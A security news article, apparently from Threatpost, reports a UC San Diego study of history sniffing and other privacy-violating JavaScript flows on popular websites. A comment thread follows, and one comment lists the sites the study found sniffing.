Study Finds Popular Sites Guilty of Hi-Jacking History

A recent study launched by the UC San Diego Department of
Computer Science to determine the scope of privacy-violating information flows at
popular websites shows that popular Web 2.0 applications such as mashups,
aggregators, and sophisticated ad targeting are teeming with various kinds of
priv

HIstory sniffingA recent study launched by the UC San Diego Department of
Computer Science to determine the scope of privacy-violating information flows at
popular websites shows that popular Web 2.0 applications such as mashups,
aggregators, and sophisticated ad targeting are teeming with various kinds of
privacy-violating flows. Ultimately the researchers determined that such attacks
are not being adequately defended against.

This study comes as a result of the increasing complexity of
JavaScript web applications propagating privacy-violating information flows. ‘Privacy-violating
information flows’ is a general term which can be subcategorized into four
areas of nefarious activity: cookie stealing, location hijacking, history sniffing,
and behavior tracking. Their goal was to draw attention to the prevalence of
history sniffing at high traffic sites.

Websites use these exploits to gather browsing information
about patrons. They then use the information to target ads and determine whether
or not patrons are visiting competing sites.

The researchers designed a customized information flow
policy language that allowed them to detect privacy-violating flows in
JavaScript code and used a modified Chrome browser to conduct their study over
the Alexa global top 50,000 websites (Alexa is a company which rates websites
based on traffic.)

Specifically, the study confirmed that out of 50,000 sites,
485 are capable of inferring browser history data. Of these 485 sites, 63 are
transferring browser history data to their network. And 46 of those were actively
participating in history sniffing. They also discovered a number of sites
exhibiting suspicious behavior, but using their current methods they were
unable to determine with certainty whether these sites were participating in
history sniffing.

Among the 46 sites employing this technique, adult sites
were most common. There were also examples of news, movie, sports, music and
finance sites as well. The highest ranking and the only site in the Alexa top
100 found guilty of history sniffing was the adult pornography site, Youporn.

Suggested articles

Discussion

  • Anonymous on

    how about a list?
  • Anonymous on

    At least one of the methods mentioned in the paper no longer works in Firefox (It will not allow the attacker to determine if a link was visited by checking it's colour, as far as Javascript is concerned in Firefox links have never been visited, ever)
  • Anonymous on

    Thanks Mr. Donohue. 

    Article's worthless without a list. 

     

  • Anonymous on

    Table 1: Websites that perform real sniffing. Top- level domains are .com if not otherwise specified. s-p and a-g abbreviate sincortespublicitarios.com and answersingenesis.org. “Src” is the source of the history sniffing JavaScript code: “I”, “M” and “F”, indicate the code came from interclick.com, meaningtool.com, and feedjit.com respectively, and “H” indicates the code came from the site itself. youporn charter.net feedjit gamestorrents newsmax namepros fulltono youporngay osdir gamesfreak morningstar espnf1 netdoctor narutocentral subirimagenes fucktube straightdope guardafilm estrenosdtl bgames 10best twincities kaushik.net todocvcd filmannex planet-f1 trailersplay minyanville pixmac fotoflexer xepisodes s-p* mimp3.net allaccess petitchef bleachcentral hoopsworld net-games.biz 6speedonline msgdiscovery moneynews a-g* divxatope subtorrents sesionvip youporncocks

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.